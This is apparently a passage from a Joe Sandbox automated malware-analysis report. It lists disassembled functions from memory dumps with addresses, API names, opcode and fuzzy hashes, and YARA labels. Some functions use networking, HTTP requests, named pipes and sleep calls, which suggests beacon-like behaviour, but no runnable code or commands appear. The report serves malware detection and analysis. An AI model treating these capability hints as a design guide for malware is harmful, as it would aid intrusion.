                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free
                        • String ID:
                        • API String ID: 1294909896-0
                        • Opcode ID: c765d2767cc6881341997e71bcd018a989170b9b961d50c461c72776cf572830
                        • Instruction ID: 43370a116c173664ebe0b096be96bb6f244fc0b185e332cefd7afb703bb69b2d
                        • Opcode Fuzzy Hash: c765d2767cc6881341997e71bcd018a989170b9b961d50c461c72776cf572830
                        • Instruction Fuzzy Hash: 8FE1C672308AC29ADB20CB27E4902AE73B1F795788F914115EF5D87758EF38DA46CB41
                        Function 00A39680 Relevance: .4, Instructions: 404COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free
                        • String ID:
                        • API String ID: 1294909896-0
                        • Opcode ID: 037a88b3a0e0121372c1e8929510804f124a0a98294513f128062ea9428e9fbd
                        • Instruction ID: 52e2b2a396331a14f82d648ec58310da7abf35876b31bce3a8f714279d3d7fcb
                        • Opcode Fuzzy Hash: 037a88b3a0e0121372c1e8929510804f124a0a98294513f128062ea9428e9fbd
                        • Instruction Fuzzy Hash: 48E1C172718A4297DF20DF26E5902AFA3A1F794798F904115FA8D87B58EF78CD05CB40
                        Function 00A3CE3C Relevance: .4, Instructions: 374COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
                        • Instruction ID: fb76d8cee692e57bd5eb4cf69b4e792b2775c20c98bdf17a775faff45a535e62
                        • Opcode Fuzzy Hash: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
                        • Instruction Fuzzy Hash: AEE19E76B10B4187EB24CB75ED413AA63A2F789795F488125EB8E97B51EF3CE485C300
                        Function 00CE9D6C Relevance: .4, Instructions: 367COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free
                        • String ID:
                        • API String ID: 1294909896-0
                        • Opcode ID: 1cd785112f09a1c6710790546be46074dbf73f7ffcb36dc8c2022c63c2ed85fc
                        • Instruction ID: 08384710fc487208dd5b6ecd365000191150edc5647ae0dce0eebb2f38d499c4
                        • Opcode Fuzzy Hash: 1cd785112f09a1c6710790546be46074dbf73f7ffcb36dc8c2022c63c2ed85fc
                        • Instruction Fuzzy Hash: F4D12873308BC296DF20DB67E8902AE6761F794788F810112EF5E97A58EF35DA46C740
                        Function 00A3916C Relevance: .4, Instructions: 367COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free
                        • String ID:
                        • API String ID: 1294909896-0
                        • Opcode ID: a24fb40c631e4fb8bf858a82f26ba5d2e30cdac9459d39304e37b5ee64eada3e
                        • Instruction ID: 42c0e34cb9b76e24ec5c92662a4c9c6100d3903b77b115927b08dbef2a2b64c3
                        • Opcode Fuzzy Hash: a24fb40c631e4fb8bf858a82f26ba5d2e30cdac9459d39304e37b5ee64eada3e
                        • Instruction Fuzzy Hash: C0D1D072704E8292DF20DF65E9912AFA761F794788F900112FE4E97A58EFB8C946C740
                        Function 00A40334 Relevance: .2, Instructions: 163COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
                        • Instruction ID: ee076d2210cbe3c96fbb69a746ff294b550a910ed38adc1aa3fd837bd0457d2e
                        • Opcode Fuzzy Hash: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
                        • Instruction Fuzzy Hash: 3661B87A718B40C6EB208F22E984B1E77B0F789B94F185129EB4D87B14DF7DC8949B41
                        Function 00D0CF97 Relevance: .1, Instructions: 134COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                        • Instruction ID: f5cebe716af2c80873aded6f79960900ef4ed4bc5ceebe86aca9a1de75d6b6f0
                        • Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                        • Instruction Fuzzy Hash: 15511DB6214A509BD714CB0DE4E076AB7E2F3CCB94F84521AE38B87768DA3CD545CB50
                        Function 00454244 Relevance: .0, Instructions: 41COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e9f3c8d7c0dc9eb8d9f57432a08b52b5443182a39e6687ec2325468b76bc3f04
                        • Instruction ID: 930aacb92f11247601ac47d832533702241d5b266a531ff47749821d0fabbfea
                        • Opcode Fuzzy Hash: e9f3c8d7c0dc9eb8d9f57432a08b52b5443182a39e6687ec2325468b76bc3f04
                        • Instruction Fuzzy Hash: A2011B8BE4DFE145F26341681C5A28A1F80E7D39BDF0C43DBBE704A3DB9649598AC319
                        Function 00D124F0 Relevance: .0, Instructions: 15COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 37212c03cd9bceab84b252eb73883c4191cfd661bc6eedc1c8d23eae7eafda83
                        • Instruction ID: 0ccd7187033b76a8e4e863b4bebedbb7c83bd3848910addd799ee8cda45a9dbf
                        • Opcode Fuzzy Hash: 37212c03cd9bceab84b252eb73883c4191cfd661bc6eedc1c8d23eae7eafda83
                        • Instruction Fuzzy Hash: EFD012CB90EEC16AF35741AC1C761EE2E9195A3F7431E434A8BB0462EBAE130C619365
                        Function 004542E4 Relevance: .0, Instructions: 13COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 106eb1b0f72589fea2580a2fb61f8e81a881fd0116f6b3c70070330428cf52fb
                        • Instruction ID: aa2f221b4563580905bccf67b4f2e99f3671f333e71eac14f76e4ce65e214ed5
                        • Opcode Fuzzy Hash: 106eb1b0f72589fea2580a2fb61f8e81a881fd0116f6b3c70070330428cf52fb
                        • Instruction Fuzzy Hash: 14D0A7CBD0DBD145E11241740C2A2861F416BA39B9B0D83AF6E74473D755085C4A9318
                        Function 00402F62 Relevance: .0, Instructions: 6COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4496158891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4496143153.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496278416.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496347460.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496397983.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496523657.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.4496645300.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_121.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a67b07fff93ef3e3d087b98e4049d786ac120a8a9678935b14bd3a1a6ec1c101
                        • Instruction ID: a90e02ae8d049601286e53e7699458ba48d96224d24485149046b028ffd0d41f
                        • Opcode Fuzzy Hash: a67b07fff93ef3e3d087b98e4049d786ac120a8a9678935b14bd3a1a6ec1c101
                        • Instruction Fuzzy Hash: 90B012A7448D1181C3000F30CC013E03334D755786F042461620440192C22CC254D10C
                        Function 00CF6BE0 Relevance: 22.7, APIs: 15, Instructions: 195networkCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: acceptioctlsocket$closesockethtonlselect
                        • String ID:
                        • API String ID: 2003300010-0
                        • Opcode ID: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                        • Instruction ID: 515b1a93a6347f00b72f0d2adbf120aa064ddd4c3a0f2e1acb9911df35890225
                        • Opcode Fuzzy Hash: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                        • Instruction Fuzzy Hash: 36918A32620B959BDB60DF65E9807AD33B1F788B98F004226EB5E47A58DF35C664CB10
                        Function 00CEEC04 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 165networksleepCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _snprintf$CloseHandleHttpInternetRequest$OpenSendSleep
                        • String ID: %s%s$*/*
                        • API String ID: 3787158362-856325523
                        • Opcode ID: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                        • Instruction ID: 0af248e44118c3e034bdc3c751d7ed3fba59c1ea3a499f8ab51f0527dc146b6d
                        • Opcode Fuzzy Hash: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                        • Instruction Fuzzy Hash: C871C272300B8896EB50DFA2E8903ED77A1F798788F500126EB5D437A4DF78C60AC760
                        Function 00CF53E4 Relevance: 18.1, APIs: 12, Instructions: 105pipesleepfileCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast$CountNamedPipeTick$CreateDisconnectFileHandleSleepStateWait
                        • String ID:
                        • API String ID: 34948862-0
                        • Opcode ID: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                        • Instruction ID: e65e53a90f196d509f9d3455efb897c0e6a695dbe8e2b8aaede48007dc293331
                        • Opcode Fuzzy Hash: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                        • Instruction Fuzzy Hash: 7C419A32300F44D6EB00DBA2E8447BD3375E388BA4F504626EF2A87BA4CF39C5558711
                        Function 00CFFE10 Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _errno.LIBCMT ref: 00CFFE36
                          • Part of subcall function 00D01D18: _getptd_noexit.LIBCMT ref: 00D01D1C
                        • _invalid_parameter_noinfo.LIBCMT ref: 00CFFE42
                        • __crtIsPackagedApp.LIBCMT ref: 00CFFE53
                        • AreFileApisANSI.KERNEL32 ref: 00CFFE62
                        • MultiByteToWideChar.KERNEL32 ref: 00CFFE88
                        • GetLastError.KERNEL32 ref: 00CFFE95
                        • _dosmaperr.LIBCMT ref: 00CFFE9D
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: ApisByteCharErrorFileLastMultiPackagedWide__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                        • String ID:
                        • API String ID: 1138158220-0
                        • Opcode ID: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
                        • Instruction ID: f80830eaf7b6e5d0f322300e9e2bdf7ab5dcf9bb7d26a6f8bf76e2fbfe9a5161
                        • Opcode Fuzzy Hash: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
                        • Instruction Fuzzy Hash: 8421BD72300B4486EB54AF66A80433DA6E1EFC9FA4F144628EB59437E6DF7CC5118322
                        Function 00CFFF6C Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                        • String ID:
                        • API String ID: 4099253644-0
                        • Opcode ID: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                        • Instruction ID: 157159ee0724258a7241aaa09f48437ea210d69c7f9327e1167a53e268e2c095
                        • Opcode Fuzzy Hash: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                        • Instruction Fuzzy Hash: B1312B75602A4885FF98EF91E89137463A0EFA5B90F58062ADE5A062A6CF7CC541D332
                        Function 00CF7308 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 73networkCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
                        • String ID: d
                        • API String ID: 1257931466-2564639436
                        • Opcode ID: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                        • Instruction ID: e0e4a7d0302e8d6339790059ce887acba84e28b4bae174f7ffd4764e2bab2b4a
                        • Opcode Fuzzy Hash: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                        • Instruction Fuzzy Hash: A5318032214B85D6DB608F61E8847EA77A4F788B88F005126EF8D47B28DF79C555CB00
                        Function 00D06E1C Relevance: 16.6, APIs: 11, Instructions: 81COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _errno.LIBCMT ref: 00D06E4E
                          • Part of subcall function 00D01D18: _getptd_noexit.LIBCMT ref: 00D01D1C
                        • __doserrno.LIBCMT ref: 00D06E45
                          • Part of subcall function 00D01CA8: _getptd_noexit.LIBCMT ref: 00D01CAC
                        • __doserrno.LIBCMT ref: 00D06EAB
                        • _errno.LIBCMT ref: 00D06EB2
                        • _invalid_parameter_noinfo.LIBCMT ref: 00D06F16
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                        • String ID:
                        • API String ID: 388111225-0
                        • Opcode ID: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                        • Instruction ID: 12a60ed41c39cafea5c43a6147627fa55d68a40e8182cafbc9cefc4c17d2fe5a
                        • Opcode Fuzzy Hash: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                        • Instruction Fuzzy Hash: D421033671035186D706AF75E88132E3A60EF81BA4F998229FE2D1B7D2CB38C8518730
                        Function 00A51B48 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 227COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: write_multi_char$write_string$free
                        • String ID:
                        • API String ID: 2630409672-3916222277
                        • Opcode ID: 1c8d6b8a065489df9c71b2e8ea70d157333f6dd13db57c526a3ea5ce9db962ed
                        • Instruction ID: 74320e16b5a18755c659eae4a6e25c90253bf7db4601d613a25c4d4837b9bace
                        • Opcode Fuzzy Hash: 1c8d6b8a065489df9c71b2e8ea70d157333f6dd13db57c526a3ea5ce9db962ed
                        • Instruction Fuzzy Hash: 3591D13271878486EB21CB65E5043BE6B70F78679AF141016EF4A17B98DB39C94DCB00
                        Function 00CF71FC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57networksleepCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: CountTick$ErrorLastSleepselectsend
                        • String ID: d
                        • API String ID: 2152284305-2564639436
                        • Opcode ID: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                        • Instruction ID: 507e4d03c5040b1895811a1ed11b82328165e3c55e06b71d8041b6e950fba15a
                        • Opcode Fuzzy Hash: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                        • Instruction Fuzzy Hash: 3621D072218B84D6D760CF61F8883EE7361F788784F404226EB9D43A58CF39C568CB54
                        Function 00CEFB08 Relevance: 15.1, APIs: 10, Instructions: 91sleepfilepipeCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CountErrorLastSleepTickWrite$BuffersDisconnectFlushNamedPipe
                        • String ID:
                        • API String ID: 3101085627-0
                        • Opcode ID: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                        • Instruction ID: bf4628471de05473dfde67a0ac15684ae5cba04dc2dc24b3e9375becb594b6da
                        • Opcode Fuzzy Hash: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                        • Instruction Fuzzy Hash: D031BD32700A459AEB10DFF6E8943EC3371F784B98F50012AEE1A97A28DF39C50AC350
                        Function 00A5621C Relevance: 15.1, APIs: 10, Instructions: 81COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _errno.LIBCMT ref: 00A5624E
                          • Part of subcall function 00A51118: _getptd_noexit.LIBCMT ref: 00A5111C
                        • __doserrno.LIBCMT ref: 00A56245
                          • Part of subcall function 00A510A8: _getptd_noexit.LIBCMT ref: 00A510AC
                        • __doserrno.LIBCMT ref: 00A562AB
                        • _errno.LIBCMT ref: 00A562B2
                        • _invalid_parameter_noinfo.LIBCMT ref: 00A56316
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                        • String ID:
                        • API String ID: 388111225-0
                        • Opcode ID: 9a7e94428e85d4ed5cd8e77b1af53c202f15bf406c2c29a1a7d54b8e8c205bff
                        • Instruction ID: f2bcfc4a2cc741e9734f5a27d3e72ed1052b3a679bed56d3d4c495e9d1cf5da0
                        • Opcode Fuzzy Hash: 9a7e94428e85d4ed5cd8e77b1af53c202f15bf406c2c29a1a7d54b8e8c205bff
                        • Instruction Fuzzy Hash: D921253271079486C7066F659D8233E7A20BBC1BB2FD58229EE211B7D2CB78C88DC710
                        Function 00D07A90 Relevance: 15.1, APIs: 10, Instructions: 67COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _errno.LIBCMT ref: 00D07ABB
                          • Part of subcall function 00D01D18: _getptd_noexit.LIBCMT ref: 00D01D1C
                        • __doserrno.LIBCMT ref: 00D07AB3
                          • Part of subcall function 00D01CA8: _getptd_noexit.LIBCMT ref: 00D01CAC
                        • __lock_fhandle.LIBCMT ref: 00D07AFF
                        • _lseek_nolock.LIBCMT ref: 00D07B18
                        • _unlock_fhandle.LIBCMT ref: 00D07B39
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock_unlock_fhandle
                        • String ID:
                        • API String ID: 1078912150-0
                        • Opcode ID: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                        • Instruction ID: 10c5d50b32fbb6f8e9cb203ea84ba4c6623f623b89b0050f22dcfd1bb6f99163
                        • Opcode Fuzzy Hash: 689a55ff460a42ab0e8479ad490ad51203e5d8515b6f39f729bbcfe6708b8e94
                        • Instruction Fuzzy Hash: 7C113432B0864046E7066F69D88137DBA61FB80BA1F595219FA2D0F3E2CB78D881C735
                        Function 00D07C08 Relevance: 15.1, APIs: 10, Instructions: 67COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _errno.LIBCMT ref: 00D07C33
                          • Part of subcall function 00D01D18: _getptd_noexit.LIBCMT ref: 00D01D1C
                        • __doserrno.LIBCMT ref: 00D07C2B
                          • Part of subcall function 00D01CA8: _getptd_noexit.LIBCMT ref: 00D01CAC
                        • __lock_fhandle.LIBCMT ref: 00D07C77
                        • _lseeki64_nolock.LIBCMT ref: 00D07C90
                        • _unlock_fhandle.LIBCMT ref: 00D07CB3
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
                        • String ID:
                        • API String ID: 2644381645-0
                        • Opcode ID: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                        • Instruction ID: b1016d0145bef90a8882ca75215e76c2dbe58ede3e43d8478e28c3c8e52b5882
                        • Opcode Fuzzy Hash: b12dde97457ee21ef34638bcae53c6e161a46aae09bdd653f8f5ca1ee8b86ca4
                        • Instruction Fuzzy Hash: 0811B122B1464046FB066F29D84136D7751EB80BB1F594715AE3E1B3D2CB78D8818779
                        Function 00D0FD50 Relevance: 13.6, APIs: 9, Instructions: 127COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _invalid_parameter_noinfo.LIBCMT ref: 00D0FD76
                        • _errno.LIBCMT ref: 00D0FD6B
                          • Part of subcall function 00D01D18: _getptd_noexit.LIBCMT ref: 00D01D1C
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                        • String ID:
                        • API String ID: 1812809483-0
                        • Opcode ID: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                        • Instruction ID: 4979ba6a54f8abdf212713e1c87f731bfb6591696fa5b549c5c34f6f31100e22
                        • Opcode Fuzzy Hash: f9c4d6ed39d3bdcb6b80e8c2d76cc2c0cca7aaaf292465ae2b9830194cf53d53
                        • Instruction Fuzzy Hash: 7A41E17261439186DB34EB22D5403A936A1EB64BA4FB84236FB9C47FE6D738C8419730
                        Function 00A5F150 Relevance: 13.6, APIs: 9, Instructions: 127COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • _invalid_parameter_noinfo.LIBCMT ref: 00A5F176
                        • _errno.LIBCMT ref: 00A5F16B
                          • Part of subcall function 00A51118: _getptd_noexit.LIBCMT ref: 00A5111C
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497238088.0000000000A30000.00000020.00001000.00020000.00000000.sdmp, Offset: 00A30000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_a30000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                        • String ID:
                        • API String ID: 1812809483-0
                        • Opcode ID: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
                        • Instruction ID: c836d9b8418ab4bbe29d743f0f03f4a9e56ddbb9cad34317d8f171a03e0bc33d
                        • Opcode Fuzzy Hash: bd2089a42f628a497311986bb7142f0c797ae3413767483a07d765319bf433f4
                        • Instruction Fuzzy Hash: 7C4114B66107958ADF20AB22D6412FD77A1F755BA6FA04236EF9447B84D738C8498B00
                        Function 00CF6500 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4497710212.0000000000CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ce0000_121.jbxd
                        Yara matches
                        Similarity
                        • API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
                        • String ID:
                        • API String ID: 3339321253-0
                        • Opcode ID: 05f6a439e9e7b1774ef1c5ddc00099d5cfca8a0839fadce43f34e2615c209cd9
